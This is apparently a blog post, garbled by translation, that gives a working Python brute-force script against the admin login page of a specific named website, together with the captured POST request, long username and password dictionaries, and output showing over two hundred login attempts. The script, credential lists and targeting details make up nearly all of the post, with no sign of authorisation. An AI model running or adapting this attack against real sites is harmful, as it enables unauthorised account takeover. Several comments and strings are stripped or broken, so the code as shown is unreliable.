python 3---ファイルの読み書き、POSTフォームリクエスト、HTML処理、リスト分割遍歴、ユーザー名とパスワードの暴力的な解読
11958 ワード
python 3-ファイルの読み書き、POSTフォームリクエスト、HTML処理、リスト分割遍歴
1、テストの対象サイト、暴力的にユーザー名とパスワードを解読する
2、暴力的に解読した辞書、ユーザー名とパスワードファイル情報
3、Pythonコードは以下の通りです.
4、運行結果:
1、テストの対象サイト、暴力的にユーザー名とパスワードを解読する
POST https://696365wz.com/admin.php/?action=login HTTP/1.1
Host: 696365wz.com
Connection: keep-alive
Content-Length: 63
Cache-Control: max-age=0
Origin: https://696365wz.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://696365wz.com/admin.php/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
adminname=admin&adminpassword=qaz123456&form=%E6%8F%90%E4%BA%A4
HTTP/1.1 200 OK
Date: Tue, 07 Jan 2020 01:04:54 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Length: 786
Content-Type: text/html; charset=utf-8
2、暴力的に解読した辞書、ユーザー名とパスワードファイル情報
:
Administrator
Guest
admin
root
user
accountAdmin01
testuser
accountUser
reportsUser
appAdmin
mongouser
db2inst1
db2admin
db2fenc1
dasusr1
mysql
test
guest
sa
probe
repl_publisher
repl_subscriber
distributor_admin
SYSTEM
SYS
DBSNMP
SCOTT
OUTLN
MDSYS
ORDSYS
WKSYS
OLAPDBA
CTXSYS
OLAPSYS
ORDPLUGINS
QS_CBADM
demo
ORACLE
missys
RMAN
QS_OS
QS_ES
SH
PM
OE
HR
QS_WS
QS
QS_ADM
QS_CS
QS_CB
Mon_user
Dba
entldbdbo
entldbreader
jagadmin
PlAdmin
pkiuser
PortalAdmin
pso
dbo
probe
sybmail
tomcat
both
role1
[email protected]
[email protected]
ftp
Ftp
FTP
manager
lp
sys
adm
charlie
mickey
daffy
bugs
donald
minnie
elmer
tweety
alfonse
al
albert
open
username
members
testing
tester
heil
borris
william
bill
ronald
george
richard
bob
georgia
pittsburgh
pittsburg
miami
sanfran
houston
greenbay
pennstate
michael
mike
monica
linda
faith
mariah
login
admin
administrator
system
supervisor
jeff
kyle
dick
yuengling
rolling
bud
beer
coors
less
stock
george
ben
benjamin
thomas
pink
www
web
internet
qwerty
asdf
qazwsx
letmein
south
trial
test
member
private
guest
1997
1998
2000
kenny
cartman
kyle
southpark
coca
pepsi
null
mulder
love
coca
indigo
caly_111
bonky
japan
true
apcc
gbh
robslob
foodeater
gene
:
123456
12345
123456789
Password
iloveyou
princess
rockyou
1234567
12345678
abc123
admin888
admin123
test
password
123456
a123456
123456a
5201314
111111
222222
333333
444444
555555
666666
777777
888888
999999
000000
woaini1314
qq123456
123123
0
1qaz2wsx
1q2w3e4r
qwe123
7758521
123qwe
a123123
123456aa
woaini520
woaini
100200
1314520
woaini123
123321
q123456
123456789
123456789a
5211314
asd123
a123456789
z123456
asd123456
a5201314
aa123456
zhang123
aptx4869
123123a
1q2w3e4r5t
1qazxsw2
5201314a
1q2w3e
aini1314
31415926
q1w2e3r4
123456qq
woaini521
1234qwer
a111111
520520
iloveyou
abc123
110110
111111a
123456abc
w123456
7758258
123qweasd
159753
qwer1234
a000000
qq123123
zxc123
123654
abc123456
123456q
qq5201314
12345678
000000a
456852
as123456
1314521
112233
521521
qazwsx123
zxc123456
abcd1234
asdasd
666666
love1314
QAZ123
aaa123
q1w2e3
aaaaaa
a123321
123000
11111111
12qwaszx
5845201314
s123456
nihao123
caonima123
zxcvbnm123
wang123
159357
1A2B3C4D
asdasd123
584520
753951
147258
1123581321
110120
qq1314520
123456.com
123123
idc123!@#
123
aaa123!@#
qq123.com
123456
wantian##*(
qwe123
qwe1234
123qwe
123qwer
1qaz2wsx
1qaz
159753
!Q@W#E
159357
147369
1234567
password
aistar123<>!N
321
idcji2010
qqqqqq
1q2w3e
q1w2e3
336699
abc123
asd123
123654
1
111111
111
111qqq...
123456
953139.
0258
111qqq!!!
1236
qqii
tyinfo
abcd36888
rst_login
OAOidc
OAOidc123!@#
OAOidc123
esin888
qwer
power123
power.liu
power.yu
dns99+588
zhengui
idc0.1
7715123
sdwer
power.zhao
sdwer123
qwer1234
esincs
jspower123.0
5656789
2323456
power.com
power123.0
power0.123
jspower.com
123123
hlwj0519-1205.jf
123321
zaxscdvf
..0
!@#$QWER
95313
1231321
321123
vipnew
idc0514
1235698
235689
326598
112233
111222
qqqqqq
idc11
21vianet
#@!ewq
1010
111qqq
1234%^&*
12345^&*()
123456
4867086
1234567
123!@#
123456!@#
10000
794613
784512
895623
789456
456123
654321
123!@#
1234!@#$
11185
12345!@#$%
qwe123!@#
!@#123
!@#321
123#@!
19861212
19831212
19841020
#@!123
#@!321
idcidc
12345^&*()
!@#$%^&*()
)(*&^%$#@!
0987654321
tyidc
1122
111222
idc123
idcidcok
idcuser
abcd1234
1234abcd
caonima
1q2w3e4r
888888
admin!@#
abc!@#
!Q@W#E$R%T
idc2010
1236
1q2w3e4r5t
qqaazz
asdasd
admin
admin1
admin123
aaa111
111aaa
123aaa
lh222
lhidc
123a
a123
123456a
a123456
aaa123
qazwsx
qazxsw
0123
123112233
123111
www.7x24.cn
shisp.net
123000
idc0123
1230..
123456789
123456qwe
123qwe
12345qwert
zxcvbnm
qwerty
qweqwe
q1w2e3
123ewq
qwe321
1qazxsw2
12qwaszx
1234rewq
123456.com
lituobestsanmao
!@#19841010
19885510
xyidc_2006
95217189
95217
chinayixun
huachen1258zz
sanhe123
3H8IDC!!#
3H8IDC72sanhe000
xiaoyili
sanhe000~!@#
3H8IDC!!#
ccfeng66131421
!@#59560955
tkggja850518`1
zhengui
anada325!@#
www.txwscx.comsritgyxf2sxy19831122zx
ZHONGGUO$#@!999@
admin13906271234
395835961
senlinyan
3203672
9527999!!!
P@ssw0rd
huaiyukeji115
idc9aewr42
idc0.1
123asdasd
qsx6059410172.
idc0001
idc800888
idc46121
123asdasd
882627.8
luofei520!@#123
852799!!!
idc0123.0
513tyml.com
abc123!@#
1q2w3e,./? ><
6504710shuazuan
123.789+
123asdasd
752883855.
senlinyan$
admin001
6695zx
scictd9821622
365obsserver!
ranglm123456
13920225257
idc925111
1qaz@wsx#edc
.......199
xu15817079919
yanjin0429
zhangznw
13527380230
idc0.01
idc123&123
662766
122.224
huaiyukeji115
.......199@
liuzhangzi1988
123456!@#$%^
idc0123
dahouzi110
123.789+
trista188#**
mm1237
07736056123
TnHoo15862380404
idc0123
189532210113
idc123
gedingfeng1102888
brown
mouse
duck
bezoek
bunny
duck
mouse
fudd
bird
capone
einstein
saysme
sezme
sezmee
password
only
test
testing
tester
test1
test2
hitler
yeltsin
yeltson
clinton
reagan
bush
nixon
dole
peaches
bulldogs
steelers
dolphins
49ers
oilers
packers
football
jordan
tyson
lewinski
tripp
hill
carey
administrator
admin1
admin
adm
system
admin2
admin97
password
master
super
admin
system
admin1
admin2
admin98
adm
supervisor
admin
superman
admin
system
super1
super2
super97
administrator
gordon
petty
trickle
lager
rock
weiser
bottle
light
filling
market
washington
franklin
jefferson
floyd
www
web
internet
password
654321
qwerty
uiop
asdf
qazwsx
letmein
rightnow
park
trial
account
private
member
guest
user
1997
1998
2000
southpark
kenny
cartman
kyle
null
scully
sexy
1111
cola
playhouse
clay
bonk
444
tokyo
bone
spukcab
gbh54
retard
eatfood
simmons
3、Pythonコードは以下の通りです.
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 7 09:23:33 2020
@author: fern.xu
"""
import requests
import time
import bs4
from bs4 import BeautifulSoup
usernamelist =[]
passwordlist = []
def username_password():# txt
'''
f1 = open('D:/soft/txt/username.txt','r')# ( ) ,
#username.txt admin 123456
usernamepasswords = f1.readlines()
f1.close()
for usernamepassword in usernamepasswords:#
username = usernamepassword.strip("
")
username1 = username.split(" ")[0]#
password1 = username.split(" ")[1]#
usernamelist.append(username1)
passwordlist.append(password1)
'''
'''
# usernamelist
filename = 'D:/soft/txt/user.txt'
with open(filename,'w') as f3:
for user in usernamelist:
f3.write(user)
f3.write('
')
# passwordlist
filename = 'D:/soft/txt/pass.txt'
with open(filename,'w') as f3:
for user in passwordlist:
f3.write(user)
f3.write('
')
'''
f0 = open('D:/soft/txt/user.txt','r')# ( ) ,
all_usernames = f0.readlines()
f0.close()
for all_username in all_usernames:
username = all_username.strip('
')
usernamelist.append(username)
f2 = open('D:/soft/txt/password.txt','r')# ( ) ,
# https://blog.csdn.net/qq_34457594/article/details/78753761
all_passwords = f2.readlines()
f2.close()
for all_password in all_passwords:
password2 = all_password.strip("
")
#print(password2)
passwordlist.append(password2)
#print(usernamelist)
#print(passwordlist)
username_password()
#print(usernamelist)
#print(passwordlist)
def posturl(username,password):
#urllib3.disable_warnings()
requests.packages.urllib3.disable_warnings()
url = 'https://696365wz.com/admin.php/?action=login'
headers = {# URL
'Host':'696365wz.com',
'Connection':'keep-alive',
'Content-Length':'63',
'Cache-Control':'max-age=0',
'Origin':'https://696365wz.com',
'Upgrade-Insecure-Requests':'1',
'Content-Type':'application/x-www-form-urlencoded',
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Referer':'https://696365wz.com/admin.php/',
'Accept-Encoding':'gzip, deflate, br',
'Accept-Language':'zh-CN,zh;q=0.9'
}
data = {'adminname':username,'adminpassword':password,'form':'%E6%8F%90%E4%BA%A4'}
html = requests.post(url=url,headers=headers,data=data,verify=False).text
#print(html)
soup=BeautifulSoup(html,'lxml')
#print(lep_soup)
href = soup.find_all("h4")
print(href)
#posturl("test","test123")
n =0
for username in usernamelist:
for password in passwordlist:
n= n + 1
print(" %d , :%s, :%s" %(n,username,password))
posturl(username,password)
time.sleep(2)
4、運行結果:
..........................
.........................
221 , :Administrator, :794613
[ , !
]
222 , :Administrator, :784512
[ , !
]
223 , :Administrator, :895623
[ , !
]
224 , :Administrator, :789456
[ , !
]
225 , :Administrator, :456123
[ , !
]
226 , :Administrator, :654321
[ , !
]
227 , :Administrator, :123!@#
[ , !
]
228 , :Administrator, :1234!@#$
[ , !
]
229 , :Administrator, :11185
[ , !
]
230 , :Administrator, :12345!@#$%
[ , !
]
231 , :Administrator, :qwe123!@#
[ , !
]